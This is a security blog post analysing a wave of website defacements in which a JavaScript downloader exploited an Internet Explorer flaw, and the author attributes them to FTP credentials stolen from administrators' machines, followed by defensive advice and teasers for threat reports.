Incidents

Malicious hackers or careless users?

There have been numerous unrelated web-sites intrusions lately. The result is that a malicious script (usually a modification of Trojan-Downloader.JS.Psyme) is put on the server in place of the original index* file, so that when a user visits the web-site the script is immediately executed. During the script execution a known/patched Microsoft IE vulnerability is exploited, which leads to the user’s PC getting infected with a Trojan spy. Inside the script, links to the Trojan usually (but not always) refer to some “sp.php”.

How could the intrusions have been conducted? There are a few possible scenarios:

1. A live hacker intrusion.

The large number of very similar cases reduces the probability of this scenario to zero.

2. Massive automatic exploitation of web-server services.

Some of the logs of infected systems that I’ve had access to show that the malicious scripts are being uploaded via FTP and using existent FTP logins. This means that a hacker (whoever or whatever s/he/it may be) has had access to the server’s logins+passwords – at least to some of them. OK, so the password file could be got via a server vulnerability & the passwords could be cracked – given the MD5 algorithm isn’t the most up-to-date thing these days. But this scenario isn’t at all likely – according to the system logs, no tampering with system services have been registered. The only intrusion-related action registered is a direct FTP logon followed by files being uploaded – it may seem like a contradiction in terms, but the intrusion was absolutely legal.

So what are the remaining probable/ possible intrusion scenarios?
Discarding the idea of sniffing, which is very unlikely, the only possibility left is…

3. Passwords stolen from end user machines.

What I’m picturing is a Windows Trojan, which could harvest passwords if it was being run on a website admin’s Windows box with FTP passwords stored on it (i.e. in Total Commander). This theory seems even more likely if we think about why the scripts are found where they’re found, on servers for sites ranging from well known media sites to private unindexed sites. There’s no obvious logic in it. But it can be explained by a Trojan, because FTP user/password data is stored in FTP client software along with IP-address data.

If the malicious program has got access to the IP/user/password FTP data, it doesn’t even have to send this data anywhere. It just needs to initiate an FTP session and infect the server with a malicious script – (assuming the user has appropriate FTP privileges, of course).

I strongly believe that #3 is the correct scenario, although I don’t have all the facts to prove it yet.

It may be very boring, but there’s an easy way to stop this epidemic of infected web sites:

– up-to-date MS patches,
– up-to-date AV bases,
– and a firewall.

plus all the common sense anti-virus precautions such as ‘Do not run suspicious programs’, Disable ActiveX in the browser’ etc. etc.

And finally, a specific solution to this particular problem: avoid saving user/password data for FTP services (or, more generally, any user/password data) in Windows clients. The only question is, whose memory is good enough to follow this advice?

Malicious hackers or careless users?

Your email address will not be published. Required fields are marked *

 

Reports

LuminousMoth APT: Sweeping attacks for the chosen few

We recently came across unusual APT activity that was detected in high volumes, albeit most likely aimed at a few targets of interest. Further analysis revealed that the actor, which we dubbed LuminousMoth, shows an affinity to the HoneyMyte group, otherwise known as Mustang Panda.

WildPressure targets the macOS platform

We found new malware samples used in WildPressure campaigns: newer version of the C++ Milum Trojan, a corresponding VBScript variant with the same version number, and a Python script working on both Windows and macOS.

Ferocious Kitten: 6 years of covert surveillance in Iran

Ferocious Kitten is an APT group that has been targeting Persian-speaking individuals in Iran. Some of the TTPs used by this threat actor are reminiscent of other groups, such as Domestic Kitten and Rampant Kitten. In this report we aim to provide more details on these findings.

Andariel evolves to target South Korea with ransomware

In April 2021, we observed a suspicious Word document with a Korean file name and decoy. It revealed a novel infection scheme and an unfamiliar payload. After a deep analysis, we came to a conclusion: the Andariel group was behind these attacks.

Subscribe to our weekly e-mails

The hottest research right in your inbox